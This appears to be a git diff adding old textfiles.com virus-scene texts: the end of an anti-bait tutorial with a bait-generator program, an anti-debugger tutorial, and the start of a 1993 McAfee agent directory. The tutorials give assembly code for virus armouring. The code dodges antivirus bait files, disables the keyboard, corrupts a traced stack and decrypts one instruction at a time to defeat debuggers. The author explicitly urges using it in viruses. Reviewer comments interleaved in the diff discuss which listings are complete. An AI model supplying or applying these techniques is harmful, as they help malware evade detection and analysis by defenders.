+ ;which means it is possibly bait. + + loop check_name ;check next character + +not_safe: + jmp exit_infect ;end of name reached with only digits so + ;do not infect + +name_safe: + +------------------------------------------------------------------------ + + This method could easilly be defeated by using file names like +'AAAAAAAA.COM' instead of '00000000.com'. + + + + Anti-Bait Techniques: Avoid Consecutive File Names + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + Many people consider this method overkill, but it is extremely +effective, if you are serious about your Post-Discovery-Stratagies. It +works by checking if the currents file to be infected, has a consecutive +file name of the previous filename. For example, if the previous file to +be infected was called 'AAAAAAAA.COM' you would not infect the next file +if it was called 'AAAAAAAB.COM'. The easiest way to do this, is save the +sum of the characters of the file name. If the next file is consecutive +to it, the sum will be the sum of the previous one + 1. i.e: + + 'AAAAAAAA' = 'A' + 'A' + 'A' + 'A' + 'A' + 'A' + 'A' + 'A' + = 208h + + 'AAAAAAAB' = 'A' + 'A' + 'A' + 'A' + 'A' + 'A' + 'A' + 'B' + = 209h + + Therefore, of the filename of your candidate file, and use it to +check if the next file to be infected is consecutive. If it is do not +infect! Example: +------------------------------------------------------------------------ + +;This code avoids infecting files with consecutive filenames. It is assumed +;that the file has already been opened, and that its file handle is in +;BX. get_sft_bx is assumed to be a sub-procedure that returns ES:DI pointing +;to the SFT entry of the handle in BX (the file to be infected). 
+ + call get_sft_bx + mov si,di + add si,20 ;File names in at offset 20h of SFT + mov cx,8 ;8 characters in name (padded with spaces) + cld ;increment SI on LODSB + xor bx,bx + mov ah,0 + +check_consecutive: + es:lodsb + cmp al,20 ;check for space + je end_cc ;if space, end of name rached + add bx,ax ;add character to sum + loop check_consecutive + +end_cc: mov ax,cs:last_sum ;the sum of the last filename + mov cs:last_sum,bx ;save the sum of this file name for next time + inc ax + cmp ax,bx + je dont_infect + + +------------------------------------------------------------------------ + + The above code is fairly lengthy, and messy, but it works! You +should also not infect a file, if it is the same length as the previous +file, for obvious reasons. This code could by defeated by incrementing +filename by values other then 1, or even by incrementing it by a RANDOM +amount each time. + + To help you test your Anti-Bait code, I have put together a Bait +Generator (Sepultura's Funky Bait Maker), which can be modified to show +how each of the above methods are defeated. Here is the complete source: +------------------------------------------------------------------------ + +;SFBM.ASM compile with A86 +;This is a bait maker that in its original state, will fail to defeat all +;of the above mentioned techniques. However, by making the modifications +;described through out the code, all of the above techniques will fail +;miserably. + +;By changing the Below EQUates, and (un)commenting certain code below, you +;can test the various technique described above, as well as any other Anti- +;Bait Technique you think off.. + +number_of_files equ 200 ;number of bait files to genrate + +file_length equ 5000 ;length of bait file. Change this to + ;catchout virii that do not infect + ;small files. (minimum 38, maximum + ;65,279). 
+ +first_character equ '0' ;Changing these two equates to 'A' to +last_character equ '9' ;'Z' will fool virii that check if + ;the filename is entirely numbers.. + + +character_range equ (last_character - first_character)+1 ;This is used + ;to calculate the + ;filename.. + + radix 16 + + org 100 + + mov ds,cs + mov ah,9 + mov dx,offset gen_msg ;prints intro message.. + int 21 + + mov cx,number_of_files ;200 bait files + +file_loop: + push cx + mov dx,offset filename + xor cx,cx + mov ax,3c02 ;CREATE/TRUNCATE "filename" + int 21 + mov bx,ax ;BX = Handle. I used a MOV, so + ;AH stays = to 0 + + mov dx,offset bait + mov cx,file_length ;file is 5000 bytes long + + ;Uncomment the IN, and ADD below, so the length of the bait becomes + ;between FILE_LENGTH and (FILE_LENGTH + 255). This is to catchout + ;virii that wont infect a file if its the same size as the last file. + ;in al,40 + ;add cx,ax + + mov ah,40 ;Write Bait Program to file.. + int 21 + + ;Uncommenting the below CALL, will cause SFBM to set each file + ;to a random date, before closing, avoiding virii which dont + ;infect new files. + ;call set_date + + pop cx + + mov ah,3e ;Closes the file.. + int 21 + + push ds + mov ax,4b00 ;This calls a execute of "filename" + ;i have set up no parameter tables, + ;so it will not actually execute, but + ;the virus will intercept and infect. + mov dx,offset filename + int 21 + pop ds + + mov ah,9 + mov dx,offset done ;prints: + int 21 ;DONE: XXXXXXXX.COM + + std + mov si,offset units + mov di,si + + +next_character: + mov dl,1 ;Add 1 to file name characters. + ;(00000000 -> 00000001) etc.. + + ;Uncommenting the code below, will cause SFBM to add between + ;2 and 5 to the file name characters. This will avoid virii that + ;check for consecutive file names, as they are not incrementing by + ;1 each time. + ;cmp si,offset units ;Are we modifying a character other? 
+ ;jne not_unit ;If not, only add 1 to the character + ;in al,40 + ;and al,3 ;Choose amount between 2 and 5 to + ;add dl,al ;add.. + ;inc dx + +not_unit: + lodsb + add al,dl ;Calculate Next File Name (increment) + cmp al,last_character + 1 ;Has it overflowed past + jb no_more_increase ;last_character? If not continue.. + + sub al,character_range ;else bring it back into range, + ds:stosb + jmp short next_character ;increment next char, and check for + ;overflow... + +no_more_increase: + ds:stosb + loop file_loop ;Do Next File (CX times) + + mov ah,4c + int 21 + +set_date: ;Sub Procedure gives file random Date & Time. + in ax,40 ;calculates the Year for Date stamp + and ax,0f + xchg dx,ax + shl dx,9 + +get_month: ;calculates the Month for Date stamp + in ax,40 + and ax,0f + cmp ax,0c + ja get_month + or ax,ax + jz get_month + shl ax,5 + or dx,ax + +get_date: ;calculates the Day of Month for Date stamp + in ax,40 + and ax,1f + or ax,ax + jz get_date + or dx,ax ;DX = DATE + +get_secs: ;calculates seconds of the Time Stamp + in ax,40 + and ax,1f + cmp ax,1d + ja get_secs + xchg cx,ax + +get_minuits: ;calculates minuits of the Time Stamp + in ax,40 + and ax,3f + cmp ax,3b + ja get_minuits + shl ax,5 + or cx,ax + +get_hours: ;calculates hours of the Time Stamp + in ax,40 + and ax,1f + cmp ax,17 + ja get_hours + shl ax,0b + or cx,ax ;CX = TIME + + mov ax,5701 ;set DATE/TIME stamp + int 21 + ret + +gen_msg db "- Sepulturas Funky Bait Maker -",0a,0d + db "Generating Funky Bait Files...",0a,0d,"$" + +done db "DONE: " +filename db 7 dup (first_character) +units db first_character + db ".COM" + db 0,0d + db "$" + +;This is the .COM program that will be at the start of each Bait file. +;It is 38 bytes long. The rest of the file will just be padded with +;garbage from memory. 
+ +bait: call bait_b + db 'Sepulturas Funky Bait File!$' +bait_b: pop dx ;DX = offset of bait message + mov ah,9 + int 21 ;print message + int 20 ;exit + +;END SFBM.ASM +------------------------------------------------------------------------ + + The above Bait Maker can be very useful, to test your Anti-Bait +techniques. It is also quite useful, for its orginal purpose - analysing +virii. Use it for either - AV - VX - they're all the same to me. + diff --git a/textfiles.com/virus/adebgtut.txt b/textfiles.com/virus/adebgtut.txt new file mode 100644 index 00000000..8551c60d --- /dev/null +++ b/textfiles.com/virus/adebgtut.txt 
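Review bot: only one of the three assembly listings in this file is complete; the two fragments under "Avoid Digital File Names" and "Avoid Consecutive File Names" reference `get_sft_bx`, `exit_infect`, `dont_infect` and `last_sum`, none of which is defined anywhere in the file, and they carry no `radix` directive, so they cannot be assembled as shown. A header comment stating that only SFBM.ASM is a full program would save readers from trying. Since the author offers SFBM.ASM for sample analysis as well, it is also worth noting at the top of the listing that its defaults (fixed 5000-byte length, all-digit consecutive names, unchanged date stamp) match exactly the heuristics the text describes, and that the randomising variants only take effect once the commented-out `set_date` call and the `in al,40` blocks are enabled.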
@@ -0,0 +1,362 @@ + Anti-Debugger Techniques + ~~~~~~~~~~~~~~~~~~~~~~~~ + + -THE-MASTER-HIDES-BEHIND-THE-MASK- + + + Ok, now the AV can not even get your virus to infect their bait +files, and if they do finally manage, they will have great problems in +getting a complete, accurate view of what they are dealing with. There +is two things they can do: + +1. Disassemble your Anti-Bait code, and create a Bait maker to fool it. +2. Disassemble your Polymorphic engine, and work out what to look for. + + Both of the above can be defeated by using Anti-Debugger +Techniques. The first is defeated by keeping your Anti - Bait routines +encrypted, and heavilly armoured, to prevent disassembly. The second can +be defeated by using the same methods on your polymorphic engine. This +section has been designed to tell you how to do it. + + Anti-Debugger Techniques: The Obvious + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + There are many simple and trivial ways to thwart debuggers. This +document will deal mainly with more advanced methods. The simple methods +outlined in this section can be seen in the code example of "Using Your +Anti-Debug Routines as the Decryption Key", later on in this document. + + Perhaps the most obvious way to kill a debugger, is to overwrite +the Interrupt Vector of Interrupts 1 (Debug Single Step), and 3 (Debug +Break Point). This can be defeated by simply skipping the instructions. +Another thing you could do, is place an INT 3 in a long loop, which will +cause the debugger to stop at the INT 3 each iteration, which will stop +the AV from simply proceeding through the loop. This is very easilly +defeated by NOP'ing out the INT 3. + + Another thing to do, is turn of the keyboard. 
There are manyways +to do this, but the simplest is: IN AL,20h ;Turn of Keyboard IRQ + OR AL,02 + OUT AL,20 + + + + IN AL,20 ;Enable Keyboard IRQ + AND AL,NOT 2 + OUT AL,20 + + Anti-Debugger Techniques: Interrupt Replacement + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + This technique involves replacing the vector of a INTERRUPT 1/3 +with the interrupt off another interrupt, and calling that instead. This +works especially well with INT 3, as it is only 1 byte long, and can not +simply be replaced with the proper Interrupt. Here is an example of INT +replacement from the virus [H8urNMEs]. It changes INT 3 to point to the +tunneled INT 21, and calls INT 3 for all DOS requests: +------------------------------------------------------------------------ + + mov ax,3503 + int 21 + + mov int_3_seg,es + mov int_3_off,bx + + lds dx, site_traced_off + mov ax,2503 + int 21 + + mov ds,cs + + mov ax,3524 + int 3 + + mov int_24_seg,es + mov int_24_off,bx +------------------------------------------------------------------------ + + It simply makes INT 3 point to DOS, and uses this fact to fetch +the INT 24 vector. + + Anti-Debugger Techniques: INT 1 Tracing Destroys the Stack + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + + When tracing through code, with INT 1, the 6 bytes below SP are +overwritten with the pushed returnig IP, CS, and Flags. There are 2 ways +to take advantage of this fact. The first is to PUSH a value on to the +stack, POP it, and then adjust SP and POP it again to see if it changes. +If it has, the code has been traced. Here is an example: +------------------------------------------------------------------------ + + PUSH AX + POP AX + DEC SP + DEC SP + POP BX ;BX should point to the pushed AX. + CMP AX,BX + JNE CODE_IS_TRACED +------------------------------------------------------------------------ + + The second way is to store a critigal value like a Decryption +key in SP. 
This value should also point to the code, and you should NOT +use any stack operations. This way, if a debugger is running, the code +that SP points to will be overwritten. Here is a complete program to +illustrate it. To make it run properly, you must have to encrypt it. I +will not how you how.. If you can not work it out you should not even be +reading this. It also has the added advantage of avoiding the TBAV '#' +(decryptor) flag. Any way here it is: +------------------------------------------------------------------------ +;STACK.ASM + + radix 16 + +elength equ (end - estart)/2 + + org 100 + + mov bp,sp + cli + mov sp,estart + sti + + mov bx,sp + mov cx,elength + +eloop: xor cs:[bx],sp ;SP is decryption key. + inc bx + inc bx ;If a Debugger is running, + cli ;All the code after ESTART will be + add sp,6 ;overwritten. + sti + loop eloop + +estart: + cli + mov sp,bp + sti + + mov ah,9 + mov dx,offset msg - 12 + add dx,12 + int 21 + mov ah,4c + int 21 + +msg db 'Yeah!!$' + +end: + +------------------------------------------------------------------------ + + Anti-Debugger Techniques: Use Your Anti-Debug Routines as The Decrypt Key + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + This is a lot easier to do then it sounds. Basically, all you have +to do is retreive a byte from the Anti - Debugger routines each time, and +use it to modify your decryption routine in some manor. Of course the code +you are decrypting must have been encrypted in a corresponding manner! Any +way, here is a code fragment example: +------------------------------------------------------------------------ + +;This code LODSBs a byte from the Anti-Debug routine, on each iteration, +;and ADDs it to the XOR key. Because of this the AV can not simply NOP +;out the INT 3, and other traps in the Anti-Debug routine which is called +;on each iteration! 
DEC_START is assumed to be the offset of the start of +;the encrypted code, while DEC_LENGTH is the number of bytes to decrypt. + + mov dl,0aa ;initial key. + +decrypt: mov di,offset dec_start + mov cx,dec_length + mov si,offset decrypt ;offset of code to use + ;to modify decryption key. +dec_loop: lodsb ;AL=byte from anti-debug + ;routines + + add dl,al ;MODIFY KEY. If code has been + ;modified, the key will be + ;wrong. + + xor [di],dl ;decrypt + inc di + + call anti_debug ;kill debuggers. + ;this call cant be NOP'd out, + ;as it is part of the Decrypt + ;key. + + cmp si,offset end_ad ;if SI has reached end of + jne no_fix ;anti-debug code, reset it. + mov si,offset decrypt + +no_fix: loop dec_loop + + jmp dec_start ;JMP past Anti_Debug to + ;the newly decrypted code.. + +Anti_Debug: in al,20 ;get IRQ status. + or al,2 ;Disable IRQ 1 (keyboard) + out 20,al + + int 3 ;stop the debugger on each loop (you cant + int 3 ;NOP these out!), note that when the debugger + ;stops here, the keyboard will be disabled, + ;so the can't do any thing! + + + push ax + push ds + xor ax,ax + mov ds,ax + xchg ax,[4] ;Kill INT 1 + int 3 ;Fuck with their heads + xchg ax,[4] ;restore INT 1 + pop ds + + mov ax,offset ad_jmp ;destination of JMP + push ax + pop ax + dec ax + dec ax ;if this code was traced, AX will no longer + pop ax ;be equal to the JMP destination + jmp ax + pop ax + ret + + (BELOW CODE IS ENCRYPTED) +dec_start: in al,20 + and al,NOT 2 + out 20,al ;Re-Enable Key board.. + + + +------------------------------------------------------------------------ + + Anti-Debugger Techniques: The Running Line + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + The last method, I am going to illustrate, is called the Running +Line. It is VERY resistant to debuggers. It involves hooking INT 1, and +Decrypting each instruction _JUST BEFORE_ it's run, and Re-Encrypting it +_STRAIGH AFTER_ it has been executed. This way, only _1_ instruction at +a time is decrypted in memory. 
Here is a fully working example. +------------------------------------------------------------------------ + +;RUNLINE.ASM + + radix 16 + + org 100 + + xor ax,ax ;ax=0 + mov es,ax ;es=ax=0 + mov di,es:W[4] + mov si,es:W[6] ;save int 1 vector + mov es:W[4],offset tracer + mov es:W[6],cs ;int1 = cs:tracer + mov bp,sp + pushf + or B[bp-1],1 ;set TRACE flag + popf ;set it + + xor dx,dx ;this serves no purpose, and + ;is just here because the first + ;instruction after setting the + ;flag is not traced. + +;********************************************************************** +;** The below data, is the Encrypted instructions. The INT 1 handler ** +;** only decrypts instruction on WORD (EVEN) boundaries. It XORs the ** +;** instruction (WORD) with its offset in CS (ie. it's IP when it's ** +;** run). Thats why each word is XOR'd with $ (it's position). ** +;********************************************************************** + + dw 01f0e XOR $ ;PUSH CS / POP DS + dw 009b4 XOR $ ;MOV AH,9h + dw 0ba90 XOR $ ;NOP / MOV DX, + dw offset msg ;offset msg + dw 021cd XOR $ ;INT 21h + dw 0e589 XOR $ ;MOV BP,SP + dw 06680 XOR $ ;AND B[BP+, + dw 0feff ;FF],FE (turn off TRACE flag). + +last_enc equ $ + dw 0bb9d XOR $ ;POPF / MOV BX, + dw last_enc ;LAST_ENC + + xor cs:W[bx],bx ;re-encrypt last instruction.. + + mov es:W[4],di + mov es:W[6],si ;restore int 1 vector + + mov ah,4c + int 21 + +;^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ +;THINGS TO NOTE FROM THE ABOVE: Firstly, in the instructions +; NOP +; MOV DX,OFFSET MSG +;the MOV DX opcode is on an odd boundary, and hence, the decryptor will +;not decrypt it. Secondly the 'DW OFFSET MSG' in MOV DX,OFFSET MSG +;is not encrypted, because it it is data from another instruction, and +;therefore it will never be executed, and passed to the INT 1 handler. +;The same goes for the +FF(-1),FE in the AND B[BP-1],FE. 
+ + +;********************************************************************** +;** The following procedure, is the work horse of this code. The CPU ** +;** will call this INT 1 handler before each opcode as long as the ** +;** TRACE flag is set. Unlike most INT 1 handlers that you'll see in ** +;** virii, this contains no defensive traps. This is because we are ** +;** tracing our own code, and not unknown (possibly hostile) code. ** +;** It retrieves the calling IP from the stack, and if it is odd, ** +;** exits. If even, it will re-encrypt the previous instruction, and ** +;** decrypt the current one. It saves the calling IP, so that it can ** +;** re-encrypt it when it is called for the next instruction. ** +;********************************************************************** + +tracer: + push bp ;save BP + mov bp,sp ;BP=SP for reference point of stack. + push si ;save SI + mov bp,W[bp+2] ;BP = calling IP (position of + ;encrypted instruction). + test bp,1 ;check if on an odd boundry.. + jnz is_odd ;it is so leave. + mov si,cs:last ;else get the position of the last + ;decrypted instruction to reincrypt. + mov cs:last,bp ;save current position for next time. + xor cs:W[si],si ;re-encrypt last (XOR it with its IP) + xor cs:W[bp],bp ;decrypt current (XOR it with its IP) +is_odd: + pop si ;restore SI + pop bp ;restore BP + iret ;adeos! + +last dw 0 ;last IP for re-encrpytion.. +msg db 'Yeah!!$' ;EVERYBODY SAY YEAH!!!! +------------------------------------------------------------------------ + + CONCLUSION + ~~~~~~~~~~ + + -TAUGHT-WHEN-WE-ARE-YOUNG-TO-HATE-ONE-ANOTHER- + + I STRONGLY urge you to employ the above techniques in your virii +and/or poly engine. If your virus refuses to infect bait files, is VERY +heavilly armoured, so the can not decrypt it, and dissasemble it, and +mutates so slowly, and on such obscure conditions, HOW ARE THEY GOING TO +IT? Devising an algorith for such a virus would be _VERY_ difficult. 
+ + + BYE -- BYE + ~~~~~~~~~~ + Thank you reading this article. I hope it's been as interesting +to read as it has been to write!! Hopefully, we will be seeing the AV +having to work _ALOT_ harder for their money too ;). Alternitively, this +could be some help to the AV community, so they can see what lies ahead. + + If you have any questions, comments, critisms, or new ideas, you +can get in touch with me on IRC, channel #VIRUS, Nickname 'Sepultura' or +'Sep'. I would really appreciate _ANY_ comments (excpet 'Get Bent!!'). + + + + - THE - END - +================================================================================ diff --git a/textfiles.com/virus/agents.txt b/textfiles.com/virus/agents.txt new file mode 100644 index 00000000..2a73cf62 --- /dev/null +++ b/textfiles.com/virus/agents.txt 
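Review bot: the keyboard-IRQ snippet in the "The Obvious" section has lost its formatting; its first instruction is run into the sentence (`the simplest is: IN AL,20h ;Turn of Keyboard IRQ`) and the block lacks the dashed rule every other listing in the file uses, so it reads as prose rather than code. Separately, the STACK.ASM listing is shipped in the clear while the text says it only works once encrypted by a step the author declines to show, so a comment marking which listings are complete programs (RUNLINE.ASM) and which are illustrative fragments would prevent readers from expecting the printed `Yeah!!` output from the file as-is.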
@@ -0,0 +1,1327 @@ + McAFEE ASSOCIATES AGENT LISTING + + February 23, 1993 + + +McAfee Associates, Inc. (408) 988-3832 office +3350 Scott Boulevard, Building 14 (408) 970-9727 fax +Santa Clara, California 95054-3107 (408) 988-4004 BBS (25 lines) +U.S.A. USR HST/v.32/v.42bis/MNP 1-5 + support@mcafee.COM InterNet + GO MCAFEE CompuServe + + In order to provide the global community with anti-virus +coverage in a timely manner, McAfee Associates has established an +Agents program to provide service, sales and support for McAfee +Associates products around the world. If you do not see your +country listed, please contact McAfee Associates directly. A +listing of United States Agents has been added to the end of this +file. + + +ARGENTINA +RAN Ingenieria de Sistemas +Address: Cosquin 10-5o. C + Buenos Aires 1408 +Contact: Maria Jose Alvarez Hamelin +Telephone: +54 (1) 642-3689 +Fax: +54 (1) 334-7802 + +AUSTRALIA +Computer Virus Clinic +Address: P.O. Box 106 + Moorebank, N.S.W. 2170 +Contact: Colin Keeble +Telephone: +61 (02) 822-4303 Sydney +Fax: +61 (02) 822-4304 +BBS: +61 (02) 602-9237 [9600bps, v.32, 24hrs] +Telephone: +61 (03) 335-4677 Melbourne +Fax: +61 (03) 335-4656 +Telephone: +61 (08) 234-5287 Adelaide +Fax: +61 (08) 234-5324 +Telephone: +61 (07) 261-3565 Queensland +Fax: +61 (07) 261-2059 + +AUSTRALIA +Computerware for Micros +Telephone: (008) 882-875 National Toll Free +Fax: +61 (08) 363-1974 National +BBS: +61 (08) 362-4293 National + ADELAIDE - HOME OFFICE +Address: 23 Magill Road + Stepney, Adelaide, S.A. 
5096 +Contact: Priestly Hillam +Telephone: +61 (08) 362-8200 + SYDNEY BRANCH +Contact: John Hillam +Telephone: +61 (02) 252-3546 +Fax: +61 (02) 252-3353 +BBS: +61 (08) 311-1036 + MELBOURNE BRANCH +Contact: Michael O'Sullivan +Telephone: +61 (03) 663-4868 +Fax: +61 (03) 663-7466 +BBS: +61 (03) 888-5932 + BRISBANE BRANCH +Telephone: +61 (07) 285-2339 +Fax: +61 (07) 363-1974 +BBS: +61 (07) 804-0239 + PERTH BRANCH +Contact: Rob Edwards +Telephone: +61 (09) 357-0818 +BBS: +61 (09) 307-8075 + CANBERRA BRANCH +Contact: David Fabris +Telephone: +61 (06) 259-1814 +BBS: +61 (06) 259-2062 + TOWNSVILLE BRANCH +BBS: +61 (077) 79-1546 + +AUSTRALIA +Doctor Disk (Perth Office) +Address: 77 Bulwer Street + Perth, WA 6000 +Contact: Greg Golden +Telephone: +61 (09) 328-2011 (Perth Office) +Fax: +61 (09) 328-9661 (Perth Office) +BBS: +61 (09) 244-2111 (Perth Office) +Telephone: +61 (02) 281-2099 (Sydney Office) +Telephone: +61 (03) 690-9100 (Melbourne Office) +Telephone: +61 (07) 831-0151 (Brisbane Office) +Telephone: +61 (08) 332-2354 (Adelaide Office) +Toll-Free: (008) 999 755 (outside of Perth Metro Area) + +AUSTRIA +ComIn Terramar Handelsgesmbh +Address: Nikolsdorfergasse 8/8 + A-1050 Wien +Contact: Ronald Schmutzer +Telephone: +43 (1) 545-3731 +Fax: +43 (1) 545-3339 +BBS: +43 (1) 545-3338 + +BAHRAIN +Deena International Commercial Agency +Address: P.O. Box 5168 + Al Zahra Bldg., 1st Floor + SH Issa Al Kabeer Rd. + Manama +Contact: Ehab Al-Maskati +Telephone: +973 261 247 +Fax: +973 230 418 +Telex: 8613 DICA BN +Cable: DICANTER + +BELGIUM +Impakt nv +Address: Ham 64 + B-9000 Gent +Contact: Frank Lateur +Telephone: +32 (91) 25 35 49 +Fax: +32 (91) 33 00 78 +BBS: +32 (91) 23 40 16 + +BELGIUM +Softserve Distributors +Address: Dynamicalaan 16 b20 + B-2601 Wilrijk +Contact: Arthur Schrey +Telephone: +32 (3) 830 59 92 +Fax: +32 (3) 830 25 92 + +BERMUDA +Applied Computer Technologies +Address: P.O. 
Box HM 2091 + Hamilton, HM HX +Contact: Craig Clark +Telephone: (809) 295-1616 +Fax: (809) 292-7967 +BBS: (809) 292-7376 [U.S. Robotics HST 14.4K] + (809) 292-1774 [v.32bis] + +BERMUDA +Business Systems Ltd. +Address: P.O. Box HM 2445 + Hamilton, HM JX +Contact: Joseph Geaney +Telephone: (809) 295-8777 +Fax: (809) 295-1149 + +BRAZIL +COMPUSUL Consultoria e Comercio de Informatica Ltda. +Address: Rua Emboabas, 68-1o andar + 04623-Sao Paulo, SP +Contact: Andre Pitkowski +Telephone: +55 (11) 530-6822 +Fax: +55 (11) 531-7598 +BBS: +55 (11) 247-2899 [1200-14,400 bps, v.32/v.32bis] + (call for BBS numbers in other cities) + +BRAZIL +Maple Informatica Ltda. +Address: R. Maranhao, 554 cj. 26 + 01240 Sao Paulo, SP +Contact: David Rotenberg +Telephone: +55 (11) 826-5311 +Fax: +55 (11) 826-5375 + +CANADA +Asgard Technologies +Address: 175 Hunter Street East Suite #313 + Hamilton, Ontario + CANADA L8N 4E7 +Contact: Michael B. Cameron +Telephone: (416) 529-9284 +Fax: (416) 529-9186 + +CANADA - British Columbia +Concise Systems Corp. +Address: #25 - 1925 Bowen Road + Nanaimo, BC + CANADA V9S 1H1 +Contact: John Fischer or Carol Sanders +Telephone: (604) 756-1604 +Fax: (604) 756-0123 + +CANADA +DOLFIN Developments Ltd. 
+Address: 2904 South Sheridan Way + Oakville, Ontario + CANADA L6J 7L7 +Contact: John Reid +Telephone: (416) 829-4344 + 1 (800) 668-7434 Toll Free +Fax: (416) 829-4380 + +DOLFIN Developments- Montreal +Address: 2690B Pitfield, Bureau 100 + St-Laurent, Montreal, Quebec + CANADA H4S 1G9 +Contact: Simon Borduas +Telephone: (514) 333-7240 +Fax: (514) 333-7165 +BBS: (514) 735-5769 + +DOLFIN Developments- West +Address: Maison Chadwick House + 1842 - 14th Street SW + Calgary, Alberta + CANADA T2T 3S9 +Contact: Terry O'Hearn +Telephone: (403) 229-3454 +Fax: (403) 229-3507 + +CANADA - Edmonton +LOGICORP Data Systems Ltd +Address: Suite 301, 11044 - 82nd Avenue + Edmonton, Alberta + CANADA T6G 0T2 +Contact: Peter Altrogge +Telephone: (403) 433-2830 +Fax: (403) 439-2134 + +CANADA - Edmonton +Programmers Guild Products +Address: 4652 - 99th Street + Edmonton, Alberta + CANADA T6E 5H5 +Contact: George Woycenko +Telephone: (403) 438-5897 +Fax: (403) 434-3957 + +CANADA - Ottawa +Schultz Computers +Address: 1825 Woodward Drive + Ottawa, Ontario + CANADA K2C 0R4 +Contact: John Schultz +Telephone: (613) 727-0589 +Fax: (613) 727-1264 +BBS: (613) 727-1264 + +CHILE +Rigg S.A. +Address: Avda. Salvador 1068 + P.O. Box 10.295 + Santiago +Contact: Ricardo Gutierrez +Telephone: +56 (2) 225-0222 +Fax: +56 (2) 225-0240 + +CZECH REPUBLIC +AEC Ltd. +Address: Sumavska 33 + 612 64 BRNO +Contact: Jiri Mrnustik, MSc. +Telephone: +42 (5) 7112 line 502 +Fax: +42 (5) 013 501 + + +DENMARK +Danadata A/S +Address: Graham Bells Vej 7 + 8200 Aarhus N +Contact: Steen Pedersen +Telephone: +45 (86) 18 28 44 +Fax: +45 (86) 78 31 38 +BBS: +45 (86) 78 31 34 [1200-9600bps/v.32/24 hours] + +FINLAND +ICL Data Oy/PC-Hotline (Kayttotuki) +Address: P.O. Box 458 + SF-00101 Helsinki +Contact: Kari Ilonen or Erkki Mustonen +Telephone: +358 (0) 567 4248 +Fax: +358 (0) 567 4160 +BBS: +358 (0) 567 5200/5203 [U.S. 
Robotics Dual Standard] + +FINLAND +SAFECO OY +Address: Kirvuntie 22 + 02140 Espoo +Contact: Hannu Ohrling +Telephone: +358 (0) 512 1100 +Fax: +358 (0) 515 151 +BBS: +358 (9)0 512 2483 +MCI Mail: 540-0324 + +FRANCE +VIF "La Pepiniere" +Address: 111, avenue de Lodeve + 34000 Montpellier +Contact: Sophie Kroll +Telephone: +33 (16) 67 06 01 55 +Fax: +33 (16) 67 58 26 61 + +GERMANY +BBT Electronics +Address: Hundsmuhler Str. 12 + W-2900 Oldenburg +Contact: David Thorlton - Marketing + Ralf Fischer - Support +Telephone: +49 (0) 441-950930 +Fax: +49 (0) 441-504481 +BBS: +49 (0) 441-9509333 + +GERMANY +BFK edv-consulting GmbH +Address: Humboldystrasse 48 + W-7500 Karlsruhe 1 +Contact: Christoph Fischer +Telephone +49 (721) 96201-1 +Fax: +49 (721) 96201-99 + +GERMANY +Nane Juergensen + Alpenstrasse 52 + 8038 Grobenzell +Contact: Nane Jurgensen +Telephone: +49 (8) 1425-3030 +Fax: +49 (8) 1425-4641 +CompuServe 100021,414 + +GERMANY +Kirschbaum Software, GmbH +Address: Kronau 15 + W 8091 Emmering b. Wbg. +Contact: Josef Kirschbaum +Telephone: +49 (0) 8067-1016 +Fax: +49 (0) 8067-1053 + +GERMANY +K.H. Kitroschat, Ingenieurbuero fr Neue Technik +Address: Naabstrasse 9 + W-4006 Erkrath +Contact: Karl-Heinz Kitroschat +Telephone: +49 (0) 2104 48626 +Fax: +49 (0) 2104 449 555 + +GERMANY +NoVIR Apura GmbH +Address: Hochofenstrasse 19-21 + 2400 Lubeck 14 +Contact: Joerg Feierabend +Telephone: +49 (0) 4513 06066 Zentrale + +49 (0) 4513 06067 Allgemeine Hotline + +49 (0) 4513 01068 Hotline mit Kennummer +Fax: +49 (0) 4513 09600 + +49 (0) 4513 01306 Infophon ueber Versionsnummern etc. +BBS: +49 (0) 4513 05267 +BTX: *NoVIR# + +GERMANY +R. Bucker EDV +Address: Nordhemmer Strae 94 + W 4955 Hille 1 +Contact: Peter Bucker +Telephone: +49 (0) 5703-2829 + +49 (0) 5703-3610 +Fax: +49 (0) 5703-3648 + +GHANA +Network Computer Systems Ltd. 
+Address: PO Box 2649 + Accra +Contact: Anne Grant +Telephone: +233 (21) 773372 + +233 (21) 772279 +Fax: +233 (21) 772279 +Telex: 3047/48 BTH25 GH + +GIBRALTAR +Interactive Systems Ltd. +Address: PO Box 397 + 15A Tuckey's Lane +Contact: Jim Watt +Telephone: +350 73285 +Fax: +350 73385 + +GREECE +TopNet Computers Ltd +Address: 15 Mpakopoulou St. + 154 51 Neo Psixiko + Athens +Contact: Dimitrios Georgiadis +Telephone: +30 (1) 647 6066 + +30 (1) 647 5378 +Fax: +30 (1) 672 6629 + +HONG KONG +Terabyte Computer Consultants Ltd. +Address: Room 1004, 10/F, Tung Wah Mansion + 199-203 Hennessy Road + Wan Chai +Contact: Isabel Chan +Telephone: +852 (0) 598-0046-51 +Fax: +852 (0) 598-0892 + +HUNGARY +Pik-SYS Company Ltd. +Address: Szentmiklosi u.18 + H-1213 Budapest +Contact: Maria Pistar +Telephone: +36 (1) 276-0864 +Fax: +36 (1) 276-5714 + +ICELAND +Tolvur og Fjarskipti +Address: Dugguvogi 2 + 104 Reykjavik +Contact: Jim Hayward or Ari Thor Johannesson +Telephone: +354 (9) 227237 +Fax: +354 227348 +BBS: +354 (9) 1995151 [6 lines] +BBS NUA: X.25 NUA 271011991000 + +INDIA +Foremost Systems P. Ltd. +Address: 2G, Kashmir Emporium Bldg. + P.m. Road + Bombay 400 034 +Contact: Mr. Siddharth Mehta +Telephone: +91 (22) 2668626 +Fax: +91 (22) 2666273 +Telex: 011-82579 (Attn: Sid Mehta) + +INDONESIA +P.T. Yakin Aman +Address: #15-16, Block FX-1 + Jalan Kelapa Gading Boulevard + Jakarta 14240 +Contact: M.A. Sunardi +Telephone: +62 (21) 451-0072 +Fax: +62 (21) 451-2731 + +IRELAND +Systemhouse Technology Group Ltd +Address: 39-40 Upper Mount Street + Dublin 2 +Contact: Dermot Williams or Stephen Kearon +Telephone: +353 